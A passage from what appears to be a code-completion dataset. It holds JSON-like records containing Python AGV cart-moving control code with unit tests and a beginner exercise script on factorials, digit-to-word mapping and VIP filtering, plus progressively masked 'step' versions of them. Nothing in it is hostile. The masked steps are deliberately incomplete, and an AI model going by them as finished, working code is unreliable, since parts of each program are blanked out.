time.sleep(3)\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\[email protected]\ndef move_cart(cartId, srcLoc, destLoc, agvId=None):\n print(cartId, srcLoc, destLoc)\n counter.setPrint(True)\n\n def callback1(obj):\n if obj['result'] == -1:\n print('error, system exit')\n obj['finish'] = True\n sys.exit(-1)\n else:\n log.warning(obj['agv'], 'start move from', obj['loc1'], 'to',\n obj['loc2'])\n moveCart(obj['agv'], obj['cart'], obj['loc1'], obj['loc2'],\n callback2, obj)\n\n def callback2(obj):\n if obj['result'] == -1:\n print('error, system exit')\n obj['finish'] = True\n sys.exit(-1)\n else:\n log.warning(obj['agv'], 'arrived', obj['loc2'])\n obj['finish'] = True\n obj = {}\n obj['loc1'] = srcLoc\n obj['loc2'] = destLoc\n obj['cart'] = cartId\n print('call ', srcLoc)\n if agvId is None:\n agvId = apply(srcLoc)\n call(agvId, srcLoc, callback1, obj)\n while not utility.is_exited():\n if 'finish' in obj:\n break\n time.sleep(0.2)\n print('------ move ', srcLoc, ' to ', destLoc, ' finish ------')\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\ndef testtestPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n print(start)\n time.sleep(3)\n seat = currentJson['seat']\n seats = str.split(seat, ',')\n print(seat)\n time.sleep(3)\n for currentseat in seats:\n print(currentseat)\n time.sleep(3)\n time.sleep(10)\n result = True\n return result\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\ndef testProcess(jsonData):\n utility.start()\n testPageAgvControl(jsonData)\n utility.finish()\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n",
"step-5": "#coding=utf-8\n# ycat\t\t\t2017-10-20\t create\n# AGV的控制 \nimport sys,os \nimport json\nimport setup\nif __name__ == '__main__':\n\tsetup.setCurPath(__file__)\nimport utility\nimport enhance\t\nimport threading\nimport time\nimport log\nimport re\nimport lock\nimport json_codec\nimport driver.agv.hdcAgvApi as api\ng_threads =[]\ng_carts = None\ng_point = None\ng_lock = threading.RLock()\nlocationEvent = enhance.event()\napi.locationEvent.connect(locationEvent.emit)\n\[email protected]()\ndef init():\n\tif utility.is_test():\n\t\treturn\n\tapi.init()\n\ttime.sleep(3)\n\ndef wait():\n\tglobal g_threads\n\tfor t in g_threads:\n\t\tt.join()\n\tg_threads.clear()\n\t\[email protected]()\ndef fini():\n\tif utility.is_test():\n\t\treturn\n\tapi.fini()\n\twait()\n\ng_stockLock = {}\n\ndef getStockA(loc):\n\tif loc[0:6] != \"stockA\":\n\t\t\treturn None\n\tm = re.search(\"stockA_row(\\d+)_col(\\d+).*\",loc)\n\tif m is None:\n\t\treturn None\n\trow = int(m.group(1))\n\tcol = int(m.group(2))\n\tif row is None:\n\t\treturn\n\tif row%2 != 1:\n\t\trow -= 1\n\treturn row*1000+col\n\t\[email protected](g_lock)\t\ndef checkTimeout(index,agvId,loc):\n\tglobal g_stockLock\n\tif index in g_stockLock:\n\t\tif utility.ticks() - g_stockLock[index] > 10*60*1000:\n\t\t\tunlockStockA(agvId,loc)\n\t\t\tlog.warning(\"delete timeout locked\",index)\n\t\t\t\n\t\n#解决在StockA两个车头对撞的问题 \ndef lockStockA(agvId,loc):\n\tglobal g_stockLock\n\tindex = getStockA(loc)\n\tif index is None:\n\t\treturn\n\tif index in g_stockLock:\n\t\tcheckTimeout(index,agvId,loc)\n\t\tlog.warning(agvId,loc,\"is locked, wait for unlock\")\n\t\tfor i in range(60*5):\n\t\t\tif index not in g_stockLock:\n\t\t\t\tbreak\n\t\t\ttime.sleep(1)\n\t\tlog.info(agvId,loc,\"wait for unlock success\")\n\tglobal g_lock\n\tlog.debug(agvId,\"lock\",loc,index)\n\tg_lock.acquire()\n\tg_stockLock[index] = utility.ticks()\n\tg_lock.release()\n\[email protected](g_lock)\t\ndef unlockStockA(agvId,loc):\n\tglobal g_stockLock\n\tindex = getStockA(loc)\n\tif index in g_stockLock:\n\t\tlog.debug(agvId,\"unlock\",loc,index)\n\t\tdel g_stockLock[index]\n\[email protected](g_lock)\ndef getPoint(originPoint):\n\tglobal g_point\n\tloadPoint()\n\tif g_point[originPoint] is not None:\n\t\treturn g_point[originPoint]\n\n\treturn originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n\tglobal g_point\n\tloadPoint()\n\tfor itemIndex in g_point:\n\t\tif g_point[itemIndex] == point:\n\t\t\treturn itemIndex\n\treturn point\n\[email protected](g_lock)\ndef loadPoint():\n\tglobal g_point\n\tfilePath = os.path.dirname(__file__)\n\tfileName = \"point.cfg\"\n\tif filePath:\n\t\tfileName = filePath + \"/\" + fileName\n\tg_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\t\ndef checkCart(cartId,scanId):\n\tscanId = scanId.strip()\n\tdef loadCart():\n\t\tglobal g_carts\n\t\tp = os.path.dirname(__file__)\n\t\tpp = \"cart.cfg\"\n\t\tif p:\n\t\t\tpp = p+\"/\"+pp \n\t\tg_carts = json_codec.load_file(pp)\n\t\t\n\tdef saveCart():\n\t\tglobal g_carts\n\t\tp = os.path.dirname(__file__)\n\t\tpp = \"cart.cfg\"\n\t\tif p:\n\t\t\tpp = p+\"/\"+pp \n\t\tjson_codec.dump_file(pp,g_carts)\n\t\t\n\tdef findCart(scanId):\n\t\tglobal g_carts\n\t\tfor c in g_carts:\n\t\t\tif g_carts[c] == scanId:\n\t\t\t\treturn c\n\t\treturn \"unknown\"\n\t\t\n\tglobal g_carts\n\tif g_carts is None:\n\t\tloadCart()\n\tif cartId in g_carts:\n\t\tif scanId != g_carts[cartId]:\n\t\t\tlog.error(\"货架ID不正确,期望货架:\"+cartId+\", 实际货架:\"+findCart(scanId))\n\t\t\traise Exception(\"货架ID不正确,期望货架:\"+cartId+\", 实际货架:\"+findCart(scanId))\n\telse:\n\t\tg_carts[cartId] = scanId\n\t\tsaveCart()\n\t\n#finishCallback参数: finishCallback(obj)\n#obj会自动带上下面三个参数 \n#obj[\"agv\"] = agvId\n#obj[\"result\"] = 0\n#obj[\"resultDesc\"] = \"success\"\n\t\ndef _run(func,args,callback,obj):\n\tdef threadFunc(func,args,callback,obj):\n\t\thasCallback = False\n\t\ttry:\n\t\t\tfunc(*args)\n\t\t\tif utility.is_exited():\n\t\t\t\treturn\n\t\t\thasCallback = True\n\t\t\tcallback(obj)\n\t\texcept Exception as e:\n\t\t\tobj[\"result\"] = -1\n\t\t\tobj[\"resultDesc\"] = str(e)\n\t\t\tlog.exception(\"agvCtrl:\",e)\n\t\t\tif \"agv\" in obj:\n\t\t\t\tagvId= obj[\"agv\"]\n\t\t\t\tlog.debug(\"小车:\"+agvId+\",出现未经处理的异常,正在返航 \")\n\t\t\t\trestAgv(agvId)\n\t\t\t\tfreeAgv(agvId)\n\t\t\tif not hasCallback:\n\t\t\t\tcallback(obj)\n\tt = threading.Thread(target=threadFunc,args=(func,args,callback,obj))\n\tglobal g_threads\n\tt.start()\n\tg_threads.append(t)\n\t\ndef _initObj(obj,agvId):\n\tobj[\"agv\"] = agvId\n\tobj[\"result\"] = 0\n\tobj[\"resultDesc\"] = \"success\"\n\t\ndef _call(agvId,locId):\n\tif api.isCartLoc(locId):\n\t\tapi.move(agvId,locId+\".1\")\n\t\tlockStockA(agvId,locId)\n\t\ttry:\n\t\t\tapi.mission(agvId,1) #旋转——》钻入货架——》扫码——》返回货架id号码 \n\t\texcept Exception as e:\n\t\t\tunlockStockA(agvId,locId)\n\t\t\traise e\n\telse:\n\t\tapi.move(agvId,locId)\n\ndef apply(locId):\n\tlocId=getOriginPoint(locId)\n\n\treturn api.apply(locId+'.1')\n\t\ndef call(agvId,locId,finishCallback,obj):\n\t_initObj(obj,agvId)\n\tlocId=getOriginPoint(locId)\n\ttry:\n\n\t\t_run(func=_call,args=(agvId,locId),callback=finishCallback,obj=obj)\n\texcept Exception as e:\n\t\trestAgv(agvId)\n\t\tfreeAgv(agvId)\n\t\traise e\n\treturn agvId\n\t \ndef _moveCart(agvId,srcLoc,locId,cartId):\n\ttry:\n\t\tc = api.mission(agvId,2) #顶升任务,这个也会返回货架ID \n\t\tif c:\n\t\t\tcheckCart(cartId,c)\n\t\tapi.move(agvId,srcLoc+\".2\") \n\texcept Exception as e:\n\t\t#TODO:ycat api.move(agvId,srcLoc+\".2\")\n\t\t#TODO:ycat raise e\n\t\tpass\n\tfinally:\n\t\tunlockStockA(agvId,srcLoc)\n\t\n\tloc,type = api.getMissionType(\"get\",\"\",srcLoc)\n\tapi.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动\n\t\n\tloc,type = api.getMissionType(\"put\",srcLoc,locId)\n\tapi.move(agvId,loc+\".3\")\n\tapi.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动\n\tlockStockA(agvId,locId)\n\ttry:\n\t\tapi.move(agvId,locId+\".4\")\n\t\tapi.mission(agvId,5) #放下货架 \n\t\tapi.move(agvId,locId+\".5\") #返航 \n\tfinally:\n\t\tunlockStockA(agvId,locId)\n\tfreeAgv(agvId)\n\t \n#带货架运输 \ndef moveCart(agvId,cartId,srcLoc,locId,finishCallback,obj):\t \n\t_initObj(obj,agvId)\n\tassert api.isCartLoc(cartId)\n\t#移动货架前,一定是locked状态 \n\t#assert api.isLocked(agvId)\n\tsrcLoc = getOriginPoint(srcLoc)\n\tlocId = getOriginPoint(locId)\n\ttry:\n\t\t_run(func=_moveCart,args=(agvId,srcLoc,locId,cartId),callback=finishCallback,obj=obj) \n\texcept Exception as e:\n\t\trestAgv(agvId)\n\t\tfreeAgv(agvId)\n\t\traise e\n\t\t\t \n\t\t\t\n#不带货架运输 \ndef move(agvId,locId,finishCallback,obj):\n\t_initObj(obj,agvId)\t\t\n\t#移动前,一定是locked状态 \n\t#assert api.isLocked(agvId)\n\ttry:\n\t\tlocId=getOriginPoint(locId)\n\t\t_run(func=api.move,args=(agvId,locId),callback=finishCallback,obj=obj) \n\texcept Exception as e:\n\t\tfreeAgv(agvId)\n\t\traise e\n\t\n#释放对agv的占用 \ndef freeAgv(agvId): \n\ttry:\n\t\tapi.unlock(agvId)\n\texcept Exception as e:\n\t\tlog.exception(\"freeAgv\",e)\n\t\n#回归转盘\ndef restAgv(agvId):\n\tagvId2 = api.getAgvId(agvId)\n\tapi.reset(agvId2)\n\n\ndef Init():\n\timport interface.dashboard.dashboardApi\n\tlocationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)\n\ttime.sleep(3)\n################# unit test ################# \ndef testgetPoint():\n\tresulta= getPoint(\"StockA_row7_col4\")\n\tassert resulta== \"begin_1\"\n\tresultb= getPoint(\"StockA_row8_col4\")\n\tassert resultb == \"begin_2\"\n\n\ndef testgetOrginPoint():\n\tresulta= getOriginPoint(\"begin_1\")\n\tassert resulta== \"StockA_row7_col4\"\n\tresultb= getOriginPoint(\"begin_2\")\n\tassert \tresultb == \"StockA_row8_col4\"\n\tresultc = getOriginPoint(\"hhahahaa\")\n\n\tassert resultc == \"hhahahaa\"\n\n\ndef testgetStockA():\n\tassert getStockA(\"stockA_row10_col3\") == 9003\n\tassert getStockA(\"stockA_row10_col4\") == 9004\n\tassert getStockA(\"stockA_row1_col1\") == 1001\n\tassert getStockA(\"stockA_row2_col2\") == 1002\n\tassert getStockA(\"stockA_row3_col2\") == 3002\n\tassert getStockA(\"stockA_row4_col2\") == 3002\n\tassert getStockA(\"stockA_row4_col2.1\") == 3002\n\tassert getStockA(\"stockB_row4_col2.1\") == None\n\tassert getStockA(\"begin_1\") == None\n\tassert getStockA(\"seat_1\") == None\n\ndef testcheckCart():\n\tglobal g_carts\n\tg_carts = None\n\tcheckCart(\"CART9001\",\"591\")\n\tcheckCart(\"CART9002\",\"592\")\n\tgg = json_codec.load_file(\"cart.cfg\")\n\tassert \"CART9001\" in gg\n\tassert \"CART9002\" in gg\n\tassert gg[\"CART9001\"] == \"591\"\n\tassert gg[\"CART9002\"] == \"592\"\n\tcheckCart(\"CART9002\",\"592\")\n\tcheckCart(\"CART9001\",\"591\")\n\ttry:\n\t\tcheckCart(\"CART9002\",\"591\")\n\t\tassert 0\n\texcept Exception as e:\n\t\ts = str(e)\n\t\tassert s.find(\"货架ID不正确,期望货架:CART9002, 实际货架:CART9001\") != -1\n\t\t\nimport counter\[email protected]\ndef move_cart(cartId,srcLoc,destLoc,agvId=None):\n\tprint(cartId,srcLoc,destLoc)\n\tcounter.setPrint(True)\n\tdef callback1(obj):\n\t\tif obj[\"result\"] == -1: \n\t\t\tprint(\"error, system exit\")\n\t\t\tobj[\"finish\"] = True\n\t\t\tsys.exit(-1) \n\t\telse:\n\t\t\tlog.warning(obj[\"agv\"],\"start move from\",obj[\"loc1\"],\"to\",obj[\"loc2\"]) \n\t\t\tmoveCart(obj[\"agv\"],obj[\"cart\"],obj[\"loc1\"],obj[\"loc2\"],callback2,obj)\n\t\n\tdef callback2(obj):\n\t\tif obj[\"result\"] == -1: \n\t\t\tprint(\"error, system exit\")\n\t\t\tobj[\"finish\"] = True\n\t\t\tsys.exit(-1) \n\t\telse:\n\t\t\tlog.warning(obj[\"agv\"],\"arrived\",obj[\"loc2\"])\n\t\tobj[\"finish\"] = True\n\t\t\t\n\tobj = {}\n\tobj[\"loc1\"] = srcLoc\n\tobj[\"loc2\"] = destLoc\n\tobj[\"cart\"] = cartId\n\tprint(\"call \",srcLoc)\n\tif agvId is None:\n\t\tagvId = apply(srcLoc)\n\n\tcall(agvId,srcLoc,callback1,obj)\n\twhile not utility.is_exited():\n\t\tif \"finish\" in obj:\n\t\t\tbreak\n\t\ttime.sleep(0.2)\n\tprint(\"------ move \",srcLoc,\" to \",destLoc,\" finish ------\")\n\t\n\t\n#def func1(start,stock1,stock2):\n#\tprint(\"-------------------- start thread ------------------------\")\n#\ttime.sleep(1) \n#\tcartId = \"CART9009\"\n#\tmove_cart(cartId,start,stock1)\n#\tnext = stock1\n#\tfor s in seats:\n#\t\tmove_cart(cartId,next,\"seat\"+str(s)+\"_1\")\n#\t\tif next == stock1:\n#\t\t\tnext = stock2\n#\t\telse:\n#\t\t\tnext = stock1\n#\t\tmove_cart(cartId,\"seat\"+str(s)+\"_1\",next)\n#\t\t# move_cart(cartId, s, next)\n#\tprint(\"=======================================\")\n#\tprint(\"finish func1\")\n#\tprint(\"=======================================\")\n\ndef func2(stock1,stock2):\n\tprint(\"-------------------- start thread ------------------------\",stock1,stock2)\n\ttime.sleep(1) \n\tcartId = \"CART9009\"\n\tfor i in range(20):\n\t\tprint(\"current loop is - \",i.__str__())\n\t\tmove_cart(cartId,stock1,stock2)\n\t\tmove_cart(cartId,stock2,stock1) \n\t\tprint(\"current loop end - \",i.__str__())\n\tprint(\"=======================================\")\n\tprint(\"finish func2\")\n\tprint(\"=======================================\")\t\n\ndef func3(times,starts,seats):\n\tcurrent=starts\n\tcartId = \"CART9009\"\n\ttime.sleep(1)\n\tfor loop in range(0,times-1):\n\t\t# current=starts\n\t\ttip1=\"currentLoop is \"+loop.__str__()+\" currentStart is \"+current\n\t\tprint(tip1)\n\t\tfor i in range(0,len(seats)):\n\t\t\tnext = str(seats[i])\n\t\t\ttip2= \"currentLoop is \"+loop.__str__()+\"currentOrigin is \"+ current\t+ \"currentNext is \" + next +\" seatIndex is \"+i.__str__()\n\t\t\tprint(tip2)\n\t\t\tprint(\"excuting\")\n\t\t\tmove_cart(cartId,current,next)\n\t\t\tcurrent = next\ndef testPageAgvControl(jsonstr):\n\tjsonData = json.loads(jsonstr)\n\tresult = False\n\tif len(jsonData)==0:\n\t\tresult=False\n\telse:\n\t\tfor currentJson in jsonData:\n\t\t\tstart = currentJson[\"start\"]\n\t\t\tseat = currentJson[\"seat\"]\n\t\t\tloop=int(currentJson[\"loop\"])\n\t\t\tseats = str.split(seat, ',')\n\t\t\tdurabilityTestTask1 = threading.Thread(target=func3, args=[loop, start, seats])\n\t\t\tdurabilityTestTask1.start()\n\t\tresult=True\n\n\treturn result\n\ndef testtestPageAgvControl(jsonstr):\n\tjsonData = json.loads(jsonstr)\n\tresult = False\n\tif len(jsonData) == 0:\n\t\tresult = False\n\telse:\n\t\tfor currentJson in jsonData:\n\t\t\tstart = currentJson[\"start\"]\n\t\t\tprint(start)\n\t\t\ttime.sleep(3)\n\t\t\tseat = currentJson[\"seat\"]\n\t\t\tseats = str.split(seat, ',')\n\t\t\tprint(seat)\n\t\t\ttime.sleep(3)\n\t\t\tfor\tcurrentseat in seats:\n\t\t\t\tprint(currentseat)\n\t\t\t\ttime.sleep(3)\n\t\t\ttime.sleep(10)\n\t\tresult = True\n\n\treturn result\n\ndef testPageUnloockAll():\n\tapi.unlockAll();\n\ndef testProcess(jsonData):\n\tutility.start()\n\ttestPageAgvControl(jsonData)\n\tutility.finish()\n\n\n\ndef test1():\n\tInit()\n\t\n\tdurabilityTestTask1= threading.Thread(target=func3,args=[20,\"stockA_row1_col3\",[\"stockA_row1_col2\",\"stockA_row1_col4\"]])\n\tdurabilityTestTask1.start()\n\n\tdurabilityTestTask2= threading.Thread(target=func3,args=[20,\"stockA_row1_col2\",[\"seat2_1\",\"stockA_row4_col2\"]])\n\t# durabilityTestTask2.start()\n\n\tdurabilityTestTask3= threading.Thread(target=func3,args=[20,\"stockA_row5_col3\",[\"seat16_1\",\"stockA_row5_col2\"]])\n\t# durabilityTestTask3.start()\n\n\tdurabilityTestTask4= threading.Thread(target=func3,args=[20,\"stockA_row6_col3\",[\"seat12_1\",\"stockA_row6_col2\"]])\n\t# durabilityTestTask4.start()\n\n\tdurabilityTestTask1.join()\n\n\t\n\t#t1.join()\t\n\tprint(\"===============ALL FINISH ========================\")\n\n\n\n\nif __name__ == '__main__':\n\t# utility.run_tests()\n\tif sys.argv is not None and len(sys.argv)>0:\n\t\tif \"process\" in sys.argv:\n\t\t\tlog.info(\"run at testPage mode\")\n\t\t\targs=\"\"\n\t\t\twith open('/agvscada/driver/args.txt', 'r', encoding='utf-8') as f:\n\t\t\t\targs=f.read()\n\t\t\tapi.init()\n\t\t\ttime.sleep(3)\n\t\t\ttestPageAgvControl(args)\n\t\telif \"unlock\" in sys.argv:\n\t\t\ttestPageUnloockAll()\n\t\telif \"test\" in sys.argv:\n\t\t\tutility.start()\n\t\t\ttest1()\n\t\t\tutility.finish()\n\n\n\n\telse:\n\t\tutility.start()\n\t\ttestgetPoint()\n\t\tutility.finish()\n\t# test3()\n\t\n\t\n\t\n\t\n",
"step-ids": [
26,
29,
30,
34,
38
]
}
|
[
26,
29,
30,
34,
38
] |
# -*- coding: utf-8 -*-
# @Time : 2020/6/12 20:19
# @Author : damon
# @Site :
# @File : work0612
# @Software: PyCharm
import math
"""
1、给定n=10,计算1! + 2! + 3! + ... + n!的值
"""
# 解法1:
n = 10
factorial = 1
sum = 0
for i in range(1, n+1):
factorial = i * factorial
sum += factorial
print(f"阶乘之和{sum}")
# 解法2:
sum1 = 0
n = 10
for i in range(1, n + 1):
F = math.factorial(i)
sum1 += F
print(f"阶乘之和{sum1}")
"""
2、给一个数字字符串13543897565,把每一位对应的数字转换成英文数字(例如:“123” -> "one-two-three")
"""
str = '13543897565'
def f(a):
list1 = []
dict1 = {1: "one", 2: "two", 3: "three", 4: "four", 5: "five", 6: "six", 7: "seven", 8: "eight", 9: "nine", 0: "zero"}
for i in list(a):
list1.append(dict1[int(i)])
print("-".join(list1))
f(str)
str1 = '13543897565'
def fa(x):
dict2 = {1: "one", 2: "two", 3: "three", 4: "four", 5: "five",
6: "six", 7: "seven", 8: "eight", 9: "nine", 0: "zero"}
return dict2[int(x)]
r = map(fa, list(str1))
print('-'.join(r))
"""
3、我的关注列表follow_list = {"status":"ok","data":{"follow_list":[{"user_id":"32804516","nickname":"羽秋璃1111233","is_friend":0,"is_vip":1},{"user_id":"35742446","nickname":"我是你的宝贝哦","is_friend":1,"is_vip":1},{"user_id":"264844","nickname":"大鱼噢大鱼","is_friend":0,"is_vip":1},{"user_id":"34362681","nickname":"薛一十三","is_friend":0,"is_vip":0}]}}
(1)如果用户是vip,对用户说“土豪xxx,我关注了你,给个打赏吧”(xxx是用户昵称)
(2)如果用户不是好友关系但是vip(is_friend=0, is_vip=1),对用户说“土豪xxx,我关注了你,给个好友位吧”
"""
follow_list = {"status":"ok","data":{"follow_list":[
{"user_id":"32804516","nickname":"羽秋璃1111233","is_friend":0,"is_vip":1},
{"user_id":"35742446","nickname":"我是你的宝贝哦","is_friend":1,"is_vip":1},
{"user_id":"264844","nickname":"大鱼噢大鱼","is_friend":0,"is_vip":1},
{"user_id":"34362681","nickname":"薛一十三","is_friend":0,"is_vip":0}]}}
for x in follow_list['data']['follow_list']:
if x['is_vip'] == 1:
print(f"土豪{x['nickname']},我关注了你,给我打赏吧")
for x in follow_list['data']['follow_list']:
if x['is_vip'] == 1 and x['is_friend'] == 0:
print(f"土豪{x['nickname']},我关注了你,给个好友位吧")
|
normal
|
{
"blob_id": "af9adc0faad4fc1426a2bd75c1c77e23e37b60bf",
"index": 2431,
"step-1": "<mask token>\n\n\ndef fa(x):\n dict2 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n return dict2[int(x)]\n\n\n<mask token>\n",
"step-2": "<mask token>\nfor i in range(1, n + 1):\n factorial = i * factorial\n sum += factorial\nprint(f'阶乘之和{sum}')\n<mask token>\nfor i in range(1, n + 1):\n F = math.factorial(i)\n sum1 += F\nprint(f'阶乘之和{sum1}')\n<mask token>\n\n\ndef f(a):\n list1 = []\n dict1 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n for i in list(a):\n list1.append(dict1[int(i)])\n print('-'.join(list1))\n\n\nf(str)\n<mask token>\n\n\ndef fa(x):\n dict2 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n return dict2[int(x)]\n\n\n<mask token>\nprint('-'.join(r))\n<mask token>\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1:\n print(f\"土豪{x['nickname']},我关注了你,给我打赏吧\")\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1 and x['is_friend'] == 0:\n print(f\"土豪{x['nickname']},我关注了你,给个好友位吧\")\n",
"step-3": "<mask token>\nn = 10\nfactorial = 1\nsum = 0\nfor i in range(1, n + 1):\n factorial = i * factorial\n sum += factorial\nprint(f'阶乘之和{sum}')\nsum1 = 0\nn = 10\nfor i in range(1, n + 1):\n F = math.factorial(i)\n sum1 += F\nprint(f'阶乘之和{sum1}')\n<mask token>\nstr = '13543897565'\n\n\ndef f(a):\n list1 = []\n dict1 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n for i in list(a):\n list1.append(dict1[int(i)])\n print('-'.join(list1))\n\n\nf(str)\nstr1 = '13543897565'\n\n\ndef fa(x):\n dict2 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n return dict2[int(x)]\n\n\nr = map(fa, list(str1))\nprint('-'.join(r))\n<mask token>\nfollow_list = {'status': 'ok', 'data': {'follow_list': [{'user_id':\n '32804516', 'nickname': '羽秋璃1111233', 'is_friend': 0, 'is_vip': 1}, {\n 'user_id': '35742446', 'nickname': '我是你的宝贝哦', 'is_friend': 1, 'is_vip':\n 1}, {'user_id': '264844', 'nickname': '大鱼噢大鱼', 'is_friend': 0, 'is_vip':\n 1}, {'user_id': '34362681', 'nickname': '薛一十三', 'is_friend': 0,\n 'is_vip': 0}]}}\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1:\n print(f\"土豪{x['nickname']},我关注了你,给我打赏吧\")\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1 and x['is_friend'] == 0:\n print(f\"土豪{x['nickname']},我关注了你,给个好友位吧\")\n",
"step-4": "import math\n<mask token>\nn = 10\nfactorial = 1\nsum = 0\nfor i in range(1, n + 1):\n factorial = i * factorial\n sum += factorial\nprint(f'阶乘之和{sum}')\nsum1 = 0\nn = 10\nfor i in range(1, n + 1):\n F = math.factorial(i)\n sum1 += F\nprint(f'阶乘之和{sum1}')\n<mask token>\nstr = '13543897565'\n\n\ndef f(a):\n list1 = []\n dict1 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n for i in list(a):\n list1.append(dict1[int(i)])\n print('-'.join(list1))\n\n\nf(str)\nstr1 = '13543897565'\n\n\ndef fa(x):\n dict2 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n return dict2[int(x)]\n\n\nr = map(fa, list(str1))\nprint('-'.join(r))\n<mask token>\nfollow_list = {'status': 'ok', 'data': {'follow_list': [{'user_id':\n '32804516', 'nickname': '羽秋璃1111233', 'is_friend': 0, 'is_vip': 1}, {\n 'user_id': '35742446', 'nickname': '我是你的宝贝哦', 'is_friend': 1, 'is_vip':\n 1}, {'user_id': '264844', 'nickname': '大鱼噢大鱼', 'is_friend': 0, 'is_vip':\n 1}, {'user_id': '34362681', 'nickname': '薛一十三', 'is_friend': 0,\n 'is_vip': 0}]}}\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1:\n print(f\"土豪{x['nickname']},我关注了你,给我打赏吧\")\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1 and x['is_friend'] == 0:\n print(f\"土豪{x['nickname']},我关注了你,给个好友位吧\")\n",
